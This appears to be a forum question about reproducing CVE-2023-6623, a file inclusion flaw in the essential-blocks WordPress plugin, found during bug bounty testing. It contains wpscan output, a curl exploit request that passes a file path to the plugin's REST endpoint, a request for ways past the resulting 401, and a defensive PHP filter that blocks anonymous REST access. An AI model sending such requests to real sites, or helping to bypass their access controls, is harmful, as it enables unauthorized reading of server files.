
Navigating CVE-2023-6623: Seeking Assistance in Crafting a WordPress LFI Vulnerability Proof of Concept [closed]

Çağlar Arlı


I was testing on a private bug bounty program and found that one of its assets is running WordPress. Upon enumerating its plugins using wpscan, I found a plugin, essential-blocks@4.0.8, which is vulnerable to LFI (see CVE-2023-6623). However, I am unable to create a PoC for it.

wpscan output:

[+] essential-blocks
 | Location: https://foo.bar.com/wp-content/plugins/essential-blocks/
 | Last Updated: 2024-04-09T10:50:00.000Z
 | [!] The version is out of date, the latest version is 4.5.9
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.0.8 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://foo.bar.com/wp-content/plugins/essential-blocks/readme.txt

vp readme.txt (essential-blocks/readme.txt):

== Changelog ==

= 4.0.8 - 18/04/2023
- Fixed: Security update & bugfix

= 4.0.7 - 17/04/2023
- Fixed: **Count Down** block's error in style tab
- Fixed: **Flipbox** block's richtext invalid html tag issue
- Fixed: Assets generation issue
- Fixed: **Advanced Navigation** block's undefined js error ....

I think this confirms it really is running version essential-blocks@4.0.8.

However, when I try to exploit it with

curl --url 'http://foo.bar.com/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data={"source":+"post"}&attributes={"__file":+"/etc"}'

I get a 401 error:

{"code":"rest_cannot_access",
"message":"DRA: Only authenticated users can access the REST API.",
"data":{"status":401}}

Note: I am URL-encoding it before sending. Also, I am pretty sure it's not blocked by any external WAF and is probably an issue with WordPress. This PoC was uploaded by wpscan itself, see https://wpscan.com/vulnerability/633c28e0-0c9e-4e68-9424-55c32789b41f/

I want to know:

  • What does this error mean?
  • What steps can I further take to find the proper PoC, bypassing this error?
  • On a rough estimate, can it be exploited with more leads, or should I report this issue and avoid wasting any time?
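For reference, a response of the shape quoted above (code rest_cannot_access, HTTP 401, before any plugin route runs) is what WordPress returns when a filter on rest_authentication_errors rejects every unauthenticated REST request site-wide. The following mu-plugin is an added illustration of that defensive pattern written for this page; it is not the questioner's code and not the component that produced the "DRA:" message, and the file location and the fixed 401 status are assumptions.

```php
<?php
/**
 * Plugin Name: Restrict REST API to authenticated users (added example)
 *
 * Illustration only (not the questioner's code, not the plugin behind the
 * "DRA:" message on the page). Place in wp-content/mu-plugins/ to load it on
 * every request (assumption: standard WordPress directory layout).
 *
 * Effect: every request under /wp-json/ from a visitor who is not logged in
 * is answered with {"code":"rest_cannot_access", ..., "data":{"status":401}}
 * by core's REST dispatcher, before the route callback of any plugin
 * (for example a /wp-json/<plugin-namespace>/... endpoint) is reached.
 */

add_filter( 'rest_authentication_errors', function ( $result ) {
    // An earlier filter has already decided (WP_Error, or true = allowed):
    // do not override its verdict.
    if ( null !== $result ) {
        return $result;
    }

    // Authenticated callers (cookie + nonce, application passwords, ...)
    // pass through unchanged; their capability checks happen per route.
    if ( is_user_logged_in() ) {
        return $result;
    }

    // Anonymous caller: short-circuit with a 401 so that no route callback,
    // including one with weak input handling, ever executes for them.
    return new WP_Error(
        'rest_cannot_access',
        __( 'Only authenticated users can access the REST API.' ),
        array( 'status' => 401 )
    );
} );
```

A blanket filter like this also blocks legitimate anonymous REST consumers (public endpoints, some front-end forms and embeds), so it is a compensating control, not a fix: a plugin with a known file-read flaw still needs to be updated or removed.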